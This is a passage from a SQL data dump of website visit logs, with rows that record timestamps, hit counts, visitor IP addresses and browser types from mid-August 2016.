1,1,0,0,'178.92.44.43','chrome'),(56601,1471344876,1,1,0,0,'91.196.178.100','chrome'),(56602,1471344969,1,1,0,0,'91.196.178.102','firefox'),(56603,1471344994,1,1,0,0,'5.255.253.26','other'),(56604,1471345118,1,1,0,0,'91.196.178.38','firefox'),(56605,1471345136,1,1,0,0,'130.193.51.81','other'),(56606,1471345384,1,1,0,0,'52.33.85.9','msie'),(56607,1471345541,1,1,0,0,'141.8.132.79','other'),(56608,1471346172,1,1,0,0,'151.80.31.109','other'),(56609,1471346199,1,1,0,0,'151.80.31.162','other'),(56610,1471346228,1,1,0,0,'51.255.66.124','other'),(56611,1471346407,1,0,1,0,'66.249.65.182',''),(56612,1471346433,1,1,0,0,'164.132.161.55','other'),(56613,1471346989,1,1,0,0,'62.210.148.247','other'),(56614,1471347096,1,1,0,0,'77.247.181.163','chrome'),(56615,1471347391,1,1,0,0,'37.53.92.92','chrome'),(56616,1471347611,1,1,0,0,'66.102.9.93','chrome'),(56617,1471347815,1,1,0,0,'164.132.161.37','other'),(56618,1471348180,1,1,0,0,'151.80.31.181','other'),(56619,1471348427,1,1,0,0,'164.132.161.54','other'),(56620,1471348550,1,0,1,0,'66.249.65.185',''),(56621,1471348681,1,1,0,0,'178.95.244.121','firefox'),(56622,1471348978,1,1,0,0,'51.255.65.63','other'),(56623,1471349028,1,1,0,0,'207.46.13.128','other'),(56624,1471349051,1,1,0,0,'178.94.231.203','chrome'),(56625,1471349583,2,2,0,0,'92.113.189.52','firefox'),(56626,1471349695,2,0,2,0,'66.249.65.185',''),(56627,1471349770,1,1,0,0,'130.193.51.79','other'),(56628,1471349773,1,1,0,0,'93.158.152.26','other'),(56629,1471349837,3,2,1,0,'66.249.65.182',''),(56630,1471349902,1,1,0,0,'178.95.244.121','firefox'),(56631,1471350250,1,1,0,0,'91.192.182.21','chrome'),(56632,1471350339,2,1,1,0,'66.249.65.185',''),(56633,1471350380,2,2,0,0,'66.249.65.182','chrome'),(56634,1471350401,1,1,0,0,'164.132.161.30','other'),(56635,1471350585,1,1,0,0,'130.193.51.81','other'),(56636,1471350760,1,1,0,0,'193.107.108.161','msie'),(56637,1471351070,1,1,0,0,'5.255.253.9','other'),(56638,1471351239,1,1,0,0,'51.255.65.86','other'),(56639,1471351296,1,0,1,0,'66.249.65.185',''),(56640,1471351652,2,0,2,0,'66.249.65.188',''),(56641,1471351788,1,1,0,0,'51.255.65.82','other'),(56642,1471351804,1,1,0,0,'164.132.161.4','other'),(56643,1471351826,1,1,0,0,'178.95.244.121','firefox'),(56644,1471351923,1,0,1,0,'66.249.65.177',''),(56645,1471352234,1,0,1,0,'66.249.65.185',''),(56646,1471352283,1,1,0,0,'37.55.227.7','firefox'),(56647,1471352294,1,1,0,0,'66.249.65.177','chrome'),(56648,1471352484,1,1,0,0,'134.249.201.23','chrome'),(56649,1471353252,1,1,0,0,'178.95.244.121','firefox'),(56650,1471353662,1,1,0,0,'51.255.65.15','other'),(56651,1471353867,1,1,0,0,'178.94.231.203','chrome'),(56652,1471353905,1,1,0,0,'164.132.161.63','other'),(56653,1471353909,1,1,0,0,'91.196.178.35','chrome'),(56654,1471354009,1,1,0,0,'195.138.85.121','chrome'),(56655,1471354214,1,1,0,0,'164.132.161.35','other'),(56656,1471354340,1,1,0,0,'91.196.178.164','chrome'),(56657,1471354419,2,0,2,0,'66.249.65.188',''),(56658,1471354820,1,1,0,0,'164.132.161.74','other'),(56659,1471355019,1,0,1,0,'66.249.65.185',''),(56660,1471355108,1,0,1,0,'66.249.65.177',''),(56661,1471355346,1,1,0,0,'151.80.31.168','other'),(56662,1471355485,1,1,0,0,'66.249.65.182','chrome'),(56663,1471355530,1,1,0,0,'178.95.244.121','firefox'),(56664,1471355583,1,1,0,0,'37.53.89.22','chrome'),(56665,1471355820,1,1,0,0,'178.94.231.203','chrome'),(56666,1471355921,1,1,0,0,'207.46.13.128','other'),(56667,1471355995,5,5,0,0,'144.76.61.21','other'),(56668,1471356550,1,1,0,0,'91.196.178.166','chrome'),(56669,1471357365,2,2,0,0,'51.254.130.62','other'),(56670,1471357467,1,0,1,0,'66.249.65.185',''),(56671,1471357685,1,1,0,0,'151.80.31.183','other'),(56672,1471358007,1,1,0,0,'69.30.210.242','other'),(56673,1471358324,1,0,1,0,'66.249.65.177',''),(56674,1471358927,2,2,0,0,'178.95.244.121','firefox'),(56675,1471358964,1,1,0,0,'51.255.65.59','other'),(56677,1471359400,1,1,0,0,'164.132.161.14','other'),(56678,1471359674,1,0,1,0,'66.249.65.182',''),(56679,1471359883,1,0,1,0,'66.249.65.188',''),(56680,1471360089,1,1,0,0,'151.80.31.101','other'),(56681,1471360351,1,1,0,0,'51.255.65.5','other'),(56682,1471360532,1,1,0,0,'164.132.161.7','other'),(56683,1471360560,1,0,1,0,'66.249.65.183',''),(56684,1471360564,2,0,2,0,'66.249.65.185',''),(56685,1471360590,1,1,0,0,'164.132.161.68','other'),(56686,1471363046,1,0,1,0,'66.249.65.183',''),(56687,1471364071,1,1,0,0,'91.244.12.184','chrome'),(56688,1471364586,1,1,0,0,'207.46.13.9','other'),(56689,1471365491,1,1,0,0,'151.80.31.108','other'),(56690,1471365710,1,1,0,0,'141.0.14.156','other'),(56691,1471365762,1,0,1,0,'66.249.65.182',''),(56692,1471366317,1,1,0,0,'164.132.161.43','other'),(56693,1471366885,1,1,0,0,'91.196.178.69','firefox'),(56694,1471367886,1,0,1,0,'66.249.65.188',''),(56695,1471368546,1,1,0,0,'141.8.142.25','other'),(56696,1471368918,1,1,0,0,'51.255.65.73','other'),(56697,1471369087,1,1,0,0,'149.202.54.5','other'),(56698,1471370252,1,1,0,0,'51.255.65.76','other'),(56699,1471370289,1,1,0,0,'51.255.65.54','other'),(56700,1471371096,1,1,0,0,'92.113.189.52','firefox'),(56701,1471372431,1,1,0,0,'164.132.161.97','other'),(56702,1471374070,1,1,0,0,'93.158.152.46','other'),(56703,1471374124,1,1,0,0,'207.46.13.128','other'),(56704,1471374720,2,0,2,0,'66.249.65.182',''),(56705,1471375002,1,1,0,0,'40.77.167.38','other'),(56706,1471375372,1,1,0,0,'130.193.37.21','other'),(56707,1471375554,1,1,0,0,'130.193.50.32','other'),(56708,1471376117,1,0,1,0,'66.249.65.185',''),(56709,1471376290,1,0,1,0,'66.249.65.182',''),(56710,1471376991,1,1,0,0,'130.193.51.19','other'),(56711,1471379847,1,0,1,0,'66.249.65.188',''),(56712,1471379926,1,1,0,0,'37.117.101.24','chrome'),(56713,1471379991,1,1,0,0,'51.255.65.16','other'),(56714,1471380632,1,1,0,0,'130.193.51.81','other'),(56715,1471380815,1,1,0,0,'164.132.161.12','other'),(56716,1471381209,1,1,0,0,'82.145.217.171','other'),(56717,1471381321,1,0,1,0,'66.249.65.183',''),(56718,1471381493,1,1,0,0,'66.249.93.117','chrome'),(56719,1471381604,1,1,0,0,'5.255.253.55','other'),(56720,1471381701,1,1,0,0,'164.132.161.4','other'),(56721,1471381724,1,1,0,0,'66.249.65.188','chrome'),(56722,1471381793,1,1,0,0,'51.255.65.33','other'),(56723,1471381813,2,2,0,0,'92.221.166.189','other'),(56724,1471382141,1,1,0,0,'5.255.253.26','other'),(56725,1471382429,1,1,0,0,'130.193.51.79','other'),(56726,1471382649,1,1,0,0,'157.55.39.34','other'),(56727,1471383036,1,1,0,0,'51.255.65.77','other'),(56728,1471383130,1,1,0,0,'5.255.253.26','other'),(56729,1471383263,1,1,0,0,'164.132.161.79','other'),(56730,1471383514,220,220,0,0,'93.219.81.16','other'),(56731,1471383562,1,1,0,0,'51.255.65.82','other'),(56732,1471384381,2,2,0,0,'188.40.95.70','other'),(56733,1471384419,71,71,0,0,'93.219.81.16','other'),(56734,1471384912,1,1,0,0,'130.193.51.45','other'),(56735,1471385030,1,1,0,0,'151.80.31.180','other'),(56736,1471385190,1,1,0,0,'164.132.161.44','other'),(56737,1471385276,1,1,0,0,'178.154.189.37','other'),(56738,1471385318,1,1,0,0,'164.132.161.7','other'),(56739,1471385660,1,1,0,0,'78.111.215.131','opera'),(56740,1471386345,1,1,0,0,'51.255.65.91','other'),(56741,1471386628,1,0,1,0,'66.249.65.188',''),(56742,1471386701,1,1,0,0,'164.132.161.83','other'),(56743,1471386764,1,1,0,0,'130.193.50.34','other'),(56744,1471387134,1,1,0,0,'164.132.161.19','other'),(56745,1471387561,1,1,0,0,'164.132.161.26','other'),(56746,1471387645,1,1,0,0,'51.255.65.77','other'),(56747,1471388039,1,1,0,0,'164.132.161.37','other'),(56748,1471388260,1,1,0,0,'66.249.65.188','chrome'),(56749,1471388933,1,1,0,0,'164.132.161.72','other'),(56750,1471389417,1,0,1,0,'66.249.65.188',''),(56751,1471389727,1,1,0,0,'164.132.161.38','other'),(56752,1471390006,1,1,0,0,'213.179.252.72','chrome'),(56753,1471390022,1,1,0,0,'130.193.51.19','other'),(56754,1471390401,1,0,1,0,'66.249.65.185',''),(56755,1471390747,1,1,0,0,'151.80.31.102','other'),(56756,1471391616,1,1,0,0,'213.179.252.72','chrome'),(56757,1471391661,1,1,0,0,'151.80.31.168','other'),(56758,1471391875,1,1,0,0,'164.132.161.22','other'),(56759,1471391948,1,1,0,0,'130.193.50.34','other'),(56761,1471393199,1,1,0,0,'51.255.65.13','other'),(56762,1471393658,1,1,0,0,'164.132.161.21','other'),(56763,1471393762,1,1,0,0,'51.255.65.71','other'),(56764,1471393769,1,1,0,0,'130.193.51.19','other'),(56765,1471393955,10,0,10,0,'66.249.65.177',''),(56766,1471393972,2,0,2,0,'66.249.65.185',''),(56767,1471394002,1,0,1,0,'66.249.65.188',''),(56768,1471394029,15,0,15,0,'66.249.65.182',''),(56769,1471394035,3,0,3,0,'66.249.65.180',''),(56770,1471394208,1,1,0,0,'164.132.161.32','other'),(56771,1471394355,1,1,0,0,'164.132.161.65','other'),(56772,1471394404,1,1,0,0,'141.8.183.25','other'),(56773,1471394650,1,1,0,0,'157.55.39.34','other'),(56774,1471395397,1,1,0,0,'51.255.65.42','other'),(56775,1471395563,1,1,0,0,'51.255.65.32','other'),(56776,1471395661,1,0,1,0,'66.249.65.182',''),(56777,1471395666,10,10,0,0,'95.158.189.118','other'),(56778,1471395673,1,0,1,0,'66.249.65.185',''),(56779,1471395968,1,1,0,0,'151.80.31.105','other'),(56780,1471396435,1,1,0,0,'141.8.183.25','other'),(56781,1471396669,19,19,0,0,'95.158.189.118','other'),(56782,1471397072,1,1,0,0,'164.132.161.39','other'),(56783,1471397468,1,0,1,0,'66.249.65.183',''),(56784,1471397559,1,1,0,0,'141.8.183.25','other'),(56785,1471397582,2,2,0,0,'95.158.189.118','other'),(56786,1471397604,1,1,0,0,'66.249.65.185','chrome'),(56787,1471397613,1,1,0,0,'164.132.161.63','other'),(56788,1471397990,1,1,0,0,'51.255.65.5','other'),(56789,1471398357,1,1,0,0,'180.76.15.163','other'),(56790,1471398534,1,0,1,0,'66.249.65.182',''),(56791,1471399005,1,1,0,0,'82.145.217.171','other'),(56792,1471399017,1,1,0,0,'51.255.65.56','other'),(56793,1471399164,1,1,0,0,'180.76.15.160','other'),(56794,1471399392,1,1,0,0,'164.132.161.86','other'),(56795,1471399899,1,0,1,0,'66.249.65.188',''),(56796,1471400068,1,1,0,0,'164.132.161.62','other'),(56797,1471400106,1,1,0,0,'164.132.161.58','other'),(56798,1471400482,1,1,0,0,'151.80.31.162','other'),(56799,1471400678,1,1,0,0,'164.132.161.56','other'),(56800,1471400806,1,0,1,0,'66.249.65.177',''),(56801,1471400860,2,0,2,0,'66.249.65.185',''),(56802,1471401173,1,1,0,0,'180.76.15.14','other'),(56803,1471401279,1,1,0,0,'157.55.39.34','other'),(56804,1471401679,16,16,0,0,'130.193.50.34','other'),(56805,1471401764,13,13,0,0,'141.8.183.25','other'),(56806,1471402073,4,4,0,0,'130.193.51.19','other'),(56807,1471402149,1,0,1,0,'66.249.65.185',''),(56808,1471402217,2,0,2,0,'66.249.65.177',''),(56809,1471402631,3,3,0,0,'130.193.50.34','other'),(56810,1471402682,6,6,0,0,'141.8.183.25','other'),(56811,1471402731,1,1,0,0,'151.80.31.164','other'),(56812,1471402894,1,1,0,0,'164.132.161.69','other'),(56813,1471402973,1,1,0,0,'141.8.184.22','other'),(56814,1471402978,1,1,0,0,'141.8.142.78','other'),(56815,1471403045,1,1,0,0,'93.158.152.26','other'),(56816,1471403047,1,1,0,0,'5.255.253.36','other'),(56817,1471403135,1,1,0,0,'141.8.132.76','other'),(56818,1471403231,2,2,0,0,'130.193.51.79','other'),(56819,1471403672,1,1,0,0,'178.154.149.10','other'),(56820,1471403798,1,1,0,0,'5.255.253.67','other'),(56821,1471403924,1,1,0,0,'51.255.65.58','other'),(56822,1471404053,1,1,0,0,'141.8.184.11','other'),(56823,1471404056,1,1,0,0,'130.193.51.45','other'),(56824,1471404181,1,1,0,0,'5.255.253.26','other'),(56825,1471404308,1,1,0,0,'93.158.152.51','other'),(56826,1471404331,1,0,1,0,'66.249.65.188',''),(56827,1471404827,1,1,0,0,'178.93.150.148','chrome'),(56828,1471406149,3,0,3,0,'66.249.65.185',''),(56829,1471406158,1,1,0,0,'51.255.65.86','other'),(56830,1471406171,1,1,0,0,'151.80.31.104','other'),(56831,1471406376,1,1,0,0,'51.255.65.45','other'),(56832,1471406746,1,0,1,0,'66.249.65.180',''),(56833,1471406799,1,1,0,0,'164.132.161.87','other'),(56834,1471406880,1,1,0,0,'164.132.161.74','other'),(56835,1471407087,1,1,0,0,'91.121.109.55','other'),(56836,1471408289,1,1,0,0,'51.255.65.32','other'),(56837,1471408348,1,1,0,0,'66.249.65.183','chrome'),(56838,1471408445,1,1,0,0,'51.255.65.58','other'),(56839,1471408473,1,1,0,0,'151.80.31.159','other'),(56840,1471408583,2,0,2,0,'66.249.65.188',''),(56841,1471408602,1,1,0,0,'40.77.167.38','other'),(56842,1471408604,1,1,0,0,'164.132.161.30','other'),(56843,1471408694,1,1,0,0,'51.255.65.89','other'),(56844,1471409073,1,1,0,0,'151.80.31.105','other'),(56845,1471410016,1,0,1,0,'66.249.65.177',''),(56846,1471410027,1,1,0,0,'130.193.50.34','other'),(56847,1471410450,1,1,0,0,'66.249.65.182','chrome'),(56848,1471410600,1,1,0,0,'51.255.65.92','other'),(56849,1471410649,1,1,0,0,'66.249.65.185','chrome'),(56850,1471411034,1,1,0,0,'151.80.31.169','other'),(56851,1471411068,1,0,1,0,'66.249.65.180',''),(56852,1471411198,1,1,0,0,'51.255.65.36','other'),(56853,1471411499,2,0,2,0,'66.249.65.188',''),(56854,1471412064,1,1,0,0,'51.255.65.26','other'),(56855,1471412382,1,1,0,0,'91.244.12.184','chrome'),(56856,1471412819,1,1,0,0,'51.255.65.84','other'),(56857,1471412857,1,1,0,0,'130.193.50.34','other'),(56858,1471413134,1,1,0,0,'51.255.65.61','other'),(56859,1471413368,2,0,2,0,'66.249.65.182',''),(56860,1471413648,1,1,0,0,'51.255.65.40','other'),(56861,1471413936,1,1,0,0,'207.46.13.9','other'),(56862,1471413948,1,1,0,0,'91.196.178.72','firefox'),(56863,1471414079,1,1,0,0,'180.76.15.158','other'),(56864,1471414122,1,0,1,0,'66.249.65.185',''),(56865,1471414131,1,1,0,0,'66.249.65.185','chrome'),(56866,1471414660,1,1,0,0,'51.255.65.37','other'),(56867,1471415612,1,1,0,0,'164.132.161.56','other'),(56868,1471415800,1,1,0,0,'51.255.65.95','other'),(56869,1471415822,1,1,0,0,'151.80.31.171','other'),(56870,1471415850,1,1,0,0,'91.196.178.100','chrome'),(56871,1471415866,1,1,0,0,'151.80.31.180','other'),(56872,1471416552,2,2,0,0,'207.46.13.9','other'),(56873,1471416580,1,1,0,0,'51.255.65.61','other'),(56874,1471416681,1,1,0,0,'94.178.150.230','chrome'),(56875,1471416755,1,1,0,0,'207.46.13.131','other'),(56876,1471417159,3,0,3,0,'66.249.65.185',''),(56877,1471417557,1,1,0,0,'151.80.31.173','other'),(56878,1471417876,1,1,0,0,'91.196.178.69','firefox'),(56879,1471418287,1,1,0,0,'51.255.65.7','other'),(56880,1471418424,1,1,0,0,'151.80.31.167','other'),(56881,1471418439,1,1,0,0,'40.77.167.38','other'),(56882,1471418533,1,0,1,0,'66.249.65.183',''),(56883,1471418828,1,1,0,0,'178.92.251.240','chrome'),(56884,1471419068,1,1,0,0,'164.132.161.77','other'),(56885,1471419403,1,1,0,0,'51.255.65.72','other'),(56886,1471419660,1,1,0,0,'91.196.178.167','chrome'),(56887,1471419811,1,1,0,0,'164.132.161.38','other'),(56888,1471420231,1,1,0,0,'151.80.31.167','other'),(56889,1471420319,1,1,0,0,'51.255.65.55','other'),(56890,1471420324,1,1,0,0,'151.80.31.156','other'),(56891,1471420435,1,0,1,0,'66.249.65.185',''),(56892,1471420485,1,1,0,0,'164.132.161.24','other'),(56893,1471420548,1,1,0,0,'91.196.176.13','chrome'),(56894,1471420565,1,1,0,0,'178.154.189.31','other'),(56895,1471421152,1,0,1,0,'66.249.65.180',''),(56896,1471421386,1,0,1,0,'66.249.65.185',''),(56897,1471421830,1,1,0,0,'91.196.178.66','firefox'),(56898,1471422110,1,1,0,0,'164.132.161.8','other'),(56899,1471422132,1,1,0,0,'178.94.32.73','chrome'),(56900,1471422368,1,1,0,0,'95.132.23.63','chrome'),(56901,1471422429,1,1,0,0,'164.132.161.78','other'),(56902,1471422724,1,1,0,0,'51.255.65.51','other'),(56903,1471422805,1,1,0,0,'164.132.161.23','other'),(56904,1471422837,1,1,0,0,'51.255.65.66','other'),(56905,1471422919,1,1,0,0,'37.53.230.117','firefox'),(56906,1471423222,1,1,0,0,'37.53.89.22','chrome'),(56907,1471423375,1,1,0,0,'164.132.161.24','other'),(56908,1471423704,1,1,0,0,'164.132.161.28','other'),(56909,1471423809,1,1,0,0,'164.132.161.86','other'),(56910,1471424293,1,1,0,0,'82.207.91.234','firefox'),(56911,1471425682,1,1,0,0,'51.255.65.49','other'),(56912,1471425689,1,1,0,0,'51.255.65.12','other'),(56913,1471425866,1,1,0,0,'66.249.65.188','chrome'),(56914,1471426096,1,1,0,0,'91.196.178.167','chrome'),(56915,1471426847,2,0,2,0,'66.249.65.188',''),(56916,1471427204,1,0,1,0,'66.249.65.177',''),(56917,1471427292,1,0,1,0,'66.249.65.185',''),(56918,1471427393,1,1,0,0,'91.196.178.70','chrome'),(56919,1471427531,1,1,0,0,'164.132.161.70','other'),(56920,1471427652,2,2,0,0,'151.80.31.182','other'),(56921,1471427895,1,1,0,0,'164.132.161.45','other'),(56922,1471427945,1,1,0,0,'91.196.178.68','chrome'),(56923,1471428326,1,1,0,0,'91.196.178.67','firefox'),(56924,1471428565,1,0,1,0,'66.249.65.180',''),(56925,1471428613,1,1,0,0,'164.132.161.19','other'),(56926,1471428681,1,1,0,0,'91.196.178.68','other'),(56927,1471428694,1,1,0,0,'176.111.33.18','firefox'),(56928,1471428844,1,0,1,0,'66.249.65.185',''),(56929,1471428887,1,1,0,0,'164.132.161.2','other'),(56930,1471429037,1,1,0,0,'164.132.161.63','other'),(56931,1471429162,1,1,0,0,'207.46.13.131','other'),(56932,1471429181,1,1,0,0,'51.255.65.29','other'),(56933,1471429211,1,1,0,0,'151.80.31.108','other'),(56934,1471429541,1,1,0,0,'66.249.65.177','chrome'),(56935,1471430328,1,0,1,0,'66.249.65.188',''),(56936,1471430791,1,1,0,0,'181.113.115.226','firefox'),(56937,1471431246,1,1,0,0,'91.196.178.167','chrome'),(56938,1471431500,1,1,0,0,'51.255.65.34','other'),(56939,1471431594,1,1,0,0,'164.132.161.84','other'),(56940,1471431632,1,1,0,0,'151.80.31.158','other'),(56941,1471432112,1,1,0,0,'164.132.161.93','other'),(56942,1471433227,1,1,0,0,'51.255.65.7','other'),(56943,1471433293,1,1,0,0,'51.255.65.23','other'),(56944,1471433318,1,1,0,0,'94.179.120.234','firefox'),(56945,1471433526,1,1,0,0,'151.80.31.155','other'),(56946,1471433542,1,1,0,0,'51.255.65.97','other'),(56947,1471433762,1,0,1,0,'66.249.65.183',''),(56948,1471434240,1,1,0,0,'61.27.140.163','firefox'),(56949,1471434398,1,1,0,0,'51.255.65.66','other'),(56950,1471434736,1,1,0,0,'37.140.189.203','chrome'),(56951,1471434775,1,0,1,0,'66.249.65.183',''),(56952,1471435309,1,1,0,0,'92.113.189.52','firefox'),(56953,1471435449,1,0,1,0,'66.249.65.185',''),(56954,1471435645,1,1,0,0,'91.244.12.184','chrome'),(56955,1471435852,3,3,0,0,'144.76.8.132','other'),(56956,1471436002,1,0,1,0,'66.249.65.188',''),(56957,1471436119,1,1,0,0,'164.132.161.47','other'),(56958,1471436397,1,1,0,0,'51.255.65.75','other'),(56959,1471436914,1,1,0,0,'37.53.230.117','firefox'),(56960,1471437219,1,1,0,0,'92.113.189.52','firefox'),(56961,1471437227,1,0,1,0,'66.249.65.185',''),(56962,1471437407,1,1,0,0,'51.255.65.77','other'),(56963,1471437514,1,1,0,0,'51.255.65.60','other'),(56964,1471437714,1,1,0,0,'37.52.94.120','chrome'),(56965,1471437947,1,1,0,0,'207.46.13.131','other'),(56966,1471438059,1,0,1,0,'68.180.230.111',''),(56967,1471438210,1,0,1,0,'66.249.65.182',''),(56968,1471438217,1,1,0,0,'37.53.230.117','firefox'),(56969,1471438344,1,1,0,0,'151.80.31.176','other'),(56970,1471438690,1,1,0,0,'164.132.161.25','other'),(56971,1471439253,1,1,0,0,'51.255.65.97','other'),(56972,1471439394,2,2,0,0,'176.120.60.167','firefox'),(56973,1471439431,1,0,1,0,'66.249.65.180',''),(56974,1471439530,1,1,0,0,'178.92.162.101','msie'),(56975,1471440348,1,0,1,0,'66.249.65.182',''),(56976,1471440379,1,1,0,0,'164.132.161.48','other'),(56977,1471440499,1,1,0,0,'66.249.93.113','chrome'),(56978,1471440585,1,1,0,0,'207.46.13.131','other'),(56979,1471440715,1,1,0,0,'51.255.65.13','other'),(56980,1471441276,1,1,0,0,'51.255.65.65','other'),(56981,1471441428,1,1,0,0,'164.132.161.56','other'),(56982,1471441957,1,1,0,0,'51.255.65.86','other'),(56983,1471442082,1,1,0,0,'195.69.222.18','other'),(56984,1471442178,1,1,0,0,'164.132.161.95','other'),(56985,1471442382,1,1,0,0,'66.249.65.182','chrome'),(56986,1471442499,1,1,0,0,'66.249.65.185','chrome'),(56987,1471442872,1,1,0,0,'92.113.128.3','chrome'),(56988,1471443081,1,1,0,0,'95.132.23.63','chrome'),(56989,1471443367,1,0,1,0,'66.249.65.188',''),(56990,1471443545,1,0,1,0,'66.249.65.183',''),(56991,1471443767,1,1,0,0,'151.80.31.155','other'),(56992,1471444135,1,1,0,0,'51.255.65.84','other'),(56993,1471444565,1,1,0,0,'151.80.31.108','other'),(56994,1471444782,2,2,0,0,'66.249.65.182','chrome'),(56995,1471445404,1,1,0,0,'51.255.65.75','other'),(56996,1471447113,1,0,1,0,'66.249.65.182',''),(56997,1471447659,1,0,1,0,'66.249.65.177',''),(56998,1471447751,1,1,0,0,'151.80.31.106','other'),(56999,1471448507,4,1,3,0,'66.249.65.185',''),(57000,1471448684,1,1,0,0,'66.249.65.183','chrome'),(57001,1471448815,1,0,1,0,'66.249.65.182',''),(57002,1471449134,2,1,1,0,'66.249.65.188',''),(57003,1471450333,1,1,0,0,'164.132.161.58','other'),(57004,1471450439,1,1,0,0,'91.196.178.66','chrome'),(57005,1471450677,1,1,0,0,'164.132.161.44','other'),(57006,1471450700,1,0,1,0,'66.249.65.185',''),(57007,1471450712,5,0,5,0,'66.249.65.182',''),(57008,1471451447,1,0,1,0,'66.249.65.183',''),(57009,1471451671,1,1,0,0,'66.249.65.182','chrome'),(57010,1471451975,1,1,0,0,'164.132.161.37','other'),(57011,1471451994,1,1,0,0,'157.55.39.34','other'),(57012,1471452108,1,0,1,0,'66.249.65.188',''),(57013,1471452359,1,1,0,0,'66.249.65.185','chrome'),(57014,1471453164,1,1,0,0,'94.179.57.251','chrome'),(57015,1471453298,1,1,0,0,'178.94.172.190','chrome'),(57016,1471453486,1,0,1,0,'66.249.65.182',''),(57017,1471453644,1,1,0,0,'66.249.65.183','chrome'),(57018,1471456499,1,1,0,0,'66.249.65.188','chrome'),(57019,1471457009,1,1,0,0,'91.196.178.35','chrome'),(57020,1471457071,1,1,0,0,'37.110.111.230','other'),(57021,1471457329,1,1,0,0,'95.215.223.228','chrome'),(57022,1471457793,2,2,0,0,'162.210.196.98','other'),(57023,1471458857,1,1,0,0,'95.133.193.191','other'),(57024,1471459025,1,1,0,0,'207.46.13.131','other'),(57025,1471459089,32,32,0,0,'46.4.120.3','other'),(57026,1471459256,1,1,0,0,'180.76.15.147','other'),(57027,1471459321,1,0,1,0,'66.249.65.185',''),(57028,1471460712,1,1,0,0,'91.244.12.184','chrome'),(57029,1471462669,1,1,0,0,'40.77.167.38','other'),(57030,1471463390,1,1,0,0,'37.117.101.24','chrome'),(57031,1471463794,2,1,1,0,'66.249.65.185',''),(57032,1471465121,1,1,0,0,'180.76.15.138','other'),(57033,1471465879,1,1,0,0,'82.145.222.162','other'),(57034,1471466953,2,0,2,0,'66.249.65.188',''),(57035,1471467018,1,0,1,0,'66.249.65.185',''),(57036,1471467123,1,1,0,0,'157.55.39.34','other'),(57037,1471468390,1,1,0,0,'164.132.161.42','other'),(57038,1471468798,1,0,1,0,'68.180.230.111',''),(57039,1471469530,1,1,0,0,'151.80.31.176','other'),(57040,1471473155,1,1,0,0,'51.255.65.31','other'),(57041,1471473735,1,1,0,0,'37.117.101.24','chrome'),(57042,1471475757,2,2,0,0,'69.30.198.186','other'),(57043,1471475915,2,2,0,0,'40.77.167.38','other'),(57044,1471477640,1,0,1,0,'66.249.65.183',''),(57045,1471481397,1,0,1,0,'66.249.76.109',''),(57046,1471482630,1,1,0,0,'51.255.65.44','other'),(57047,1471482691,1,1,0,0,'164.132.161.14','other'),(57048,1471483316,1,1,0,0,'51.255.65.13','other'),(57049,1471483789,1,0,1,0,'66.249.76.113',''),(57050,1471483882,1,1,0,0,'164.132.161.22','other'),(57051,1471484353,1,1,0,0,'164.132.161.63','other'),(57052,1471484434,1,1,0,0,'176.195.98.250','msie'),(57053,1471484435,1,1,0,0,'128.68.98.248','msie'),(57055,1471484436,1,1,0,0,'95.27.235.186','msie'),(57057,1471484892,1,1,0,0,'128.68.139.56','msie'),(57058,1471485681,1,1,0,0,'151.80.31.180','other'),(57059,1471487052,1,1,0,0,'151.80.31.183','other'),(57060,1471488211,3,0,3,0,'66.249.76.113',''),(57061,1471488362,1,0,1,0,'66.249.76.114',''),(57062,1471488364,17,0,17,0,'66.249.76.112',''),(57063,1471488489,2,0,2,0,'66.249.66.182',''),(57064,1471488964,1,1,0,0,'51.255.65.10','other'),(57065,1471489237,1,1,0,0,'164.132.161.7','other'),(57066,1471489278,2,0,2,0,'66.249.76.112',''),(57067,1471490023,1,1,0,0,'95.221.240.89','msie'),(57068,1471490187,1,1,0,0,'164.132.161.15','other'),(57069,1471490188,1,1,0,0,'164.132.161.41','other'),(57070,1471490476,1,1,0,0,'66.102.9.103','chrome'),(57071,1471491430,1,1,0,0,'164.132.161.31','other'),(57072,1471491578,1,1,0,0,'40.77.167.38','other'),(57073,1471491582,1,0,1,0,'66.249.66.185',''),(57074,1471491585,5,0,5,0,'66.249.66.182',''),(57075,1471491589,13,0,13,0,'66.249.76.112',''),(57076,1471491807,1,1,0,0,'176.193.169.56','msie'),(57077,1471492023,1,0,1,0,'66.249.76.114',''),(57078,1471492566,1,1,0,0,'207.46.13.131','other'),(57079,1471492711,1,1,0,0,'164.132.161.84','other'),(57080,1471492981,1,0,1,0,'66.249.66.185',''),(57081,1471493518,1,1,0,0,'51.255.66.125','other'),(57082,1471494002,1,0,1,0,'66.249.76.112',''),(57083,1471494249,1,0,1,0,'68.180.230.178',''),(57084,1471494566,1,1,0,0,'51.255.65.59','other'),(57085,1471494920,1,0,1,0,'66.249.76.108',''),(57086,1471495625,1,1,0,0,'51.255.65.26','other'),(57087,1471495928,1,1,0,0,'151.80.31.180','other'),(57088,1471496648,1,1,0,0,'94.179.61.124','firefox'),(57089,1471496684,1,1,0,0,'180.76.15.10','other'),(57090,1471497099,1,0,1,0,'66.249.76.112',''),(57091,1471497589,1,0,1,0,'66.249.76.107',''),(57092,1471497633,1,1,0,0,'151.80.31.179','other'),(57093,1471498474,1,1,0,0,'95.163.177.196','chrome'),(57094,1471498502,1,1,0,0,'66.249.83.250','chrome'),(57095,1471499197,1,1,0,0,'164.132.161.37','other'),(57096,1471499357,1,0,1,0,'66.249.76.112',''),(57097,1471499414,1,1,0,0,'51.255.65.66','other'),(57098,1471500113,1,1,0,0,'194.146.139.229','opera'),(57099,1471500197,1,0,1,0,'66.249.76.113',''),(57100,1471500259,1,1,0,0,'91.196.178.71','firefox'),(57101,1471500591,1,1,0,0,'51.255.65.77','other'),(57102,1471500849,1,1,0,0,'95.135.89.199','firefox'),(57103,1471501275,1,1,0,0,'51.255.65.91','other'),(57104,1471501721,1,1,0,0,'130.180.217.38','chrome'),(57105,1471501963,1,1,0,0,'51.255.65.97','other'),(57106,1471502688,1,1,0,0,'164.132.161.75','other'),(57107,1471503051,1,0,1,0,'66.249.76.107',''),(57108,1471503349,1,1,0,0,'180.76.15.25','other'),(57109,1471504118,1,1,0,0,'51.255.65.64','other'),(57110,1471504329,1,0,1,0,'66.249.66.188',''),(57111,1471504427,1,1,0,0,'164.132.161.84','other'),(57112,1471504529,1,0,1,0,'66.249.76.114',''),(57113,1471504643,1,1,0,0,'207.46.13.9','other'),(57114,1471504856,1,1,0,0,'82.207.61.14','chrome'),(57115,1471505018,28,28,0,0,'151.80.44.115','other'),(57116,1471505214,1,1,0,0,'164.132.161.38','other'),(57117,1471505624,1,1,0,0,'91.196.178.66','f